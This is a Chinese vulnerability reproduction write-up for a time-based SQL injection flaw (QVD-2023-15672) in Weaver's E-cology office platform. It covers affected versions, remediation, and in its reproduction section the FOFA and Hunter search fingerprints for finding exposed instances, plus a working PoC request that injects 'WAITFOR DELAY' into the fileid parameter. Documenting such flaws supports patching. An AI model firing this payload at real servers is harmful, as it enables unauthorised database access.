泛微E-cology sql延时注入漏洞(QVD-2023-15672)复现

参考文章:

泛微E-Cology SQL注入漏洞复现(QVD-2023-15672)

1.产品简介

泛微E-cology系统是中国泛微网络科技股份有限公司(以下简称“泛微科技”)开发的一种企业级协同办公平台。该系统以办公自动化和协同办公为核心,提供了一系列功能和工具,帮助企业实现信息管理、流程管控、团队协作和业务应用等多方面的需求。

泛微E-cology系统具有以下主要特点和功能:

  1. 办公自动化:系统支持企业内部的各种办公流程自动化,包括审批流程、请假流程、报销流程等,提高工作效率和减少重复性工作。
  2. 协同办公:系统提供了团队协作、文档分享和讨论等功能,便于员工之间的信息共享和协调,增强团队合作和沟通效率。
  3. 企业信息管理:系统可以集中管理企业的人员信息、组织架构、项目信息等重要数据,方便企业对信息进行统一管理和查询。
  4. 业务应用扩展:系统支持自定义业务应用的开发和集成,可以根据企业的实际需求定制特定的应用模块,满足企业的个性化需求。
  5. 安全性和权限控制:系统具备严格的权限管理和安全机制,确保用户数据的安全性和访问控制。

泛微E-cology系统适用于各类企业和组织,可以帮助企业优化流程、提高工作效率、加强团队协作,提升整体管理水平。同时,泛微科技也不断进行技术创新和产品优化,以满足不同企业的个性化需求。

2.漏洞概述

泛微E-cology的延时SQL注入漏洞可以被攻击者利用来获取未经授权的数据库访问权限,窃取敏感数据、修改数据或者执行其他恶意操作。攻击者可以通过构造特定的注入字符串,操纵应用程序的数据库查询,以达到攻击目的。

延时SQL注入漏洞的危害在于,它可能导致敏感数据泄露、系统崩溃、业务中断,甚至可能为攻击者提供全面的控制权限,从而危害企业的信息安全和业务运作。

3.影响范围

E-cology 9.x 补丁版本 < 10.58.0

E-cology 8.x 补丁版本 < 10.58.0

4.复现过程

1.资产检索

鹰图:web.icon="41eca7a9245394106a09b2534d8030df"
fofa:app="泛微-协同商务系统"

2.漏洞复现

访问搜索到的资产

尝试访问

http://[ip]/weaver/weaver.file.FileDownloadForOutDoc?fileid=1+WAITFOR+DELAY%270%3A0%3A8%27&isFromOutImg=1

发现sleep8秒后加载内容

加载8秒后成功加载:

验证成功。

Poc

GET /weaver/weaver.file.FileDownloadForOutDoc?fileid=1+WAITFOR+DELAY%270%3A0%3A7%27&isFromOutImg=1HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

5.修复方案

临时解决方案:

限制访问来源地址,如非必要,不要将系统开放在互联网上。

升级修复方案:

官方已发布安全补丁,建议受影响用户尽快升级至10.58及以上版本

https://www.weaver.com.cn/cs/securityDownload.asp#

6.参考文章

泛微E-Cology SQL注入漏洞复现(QVD-2023-15672)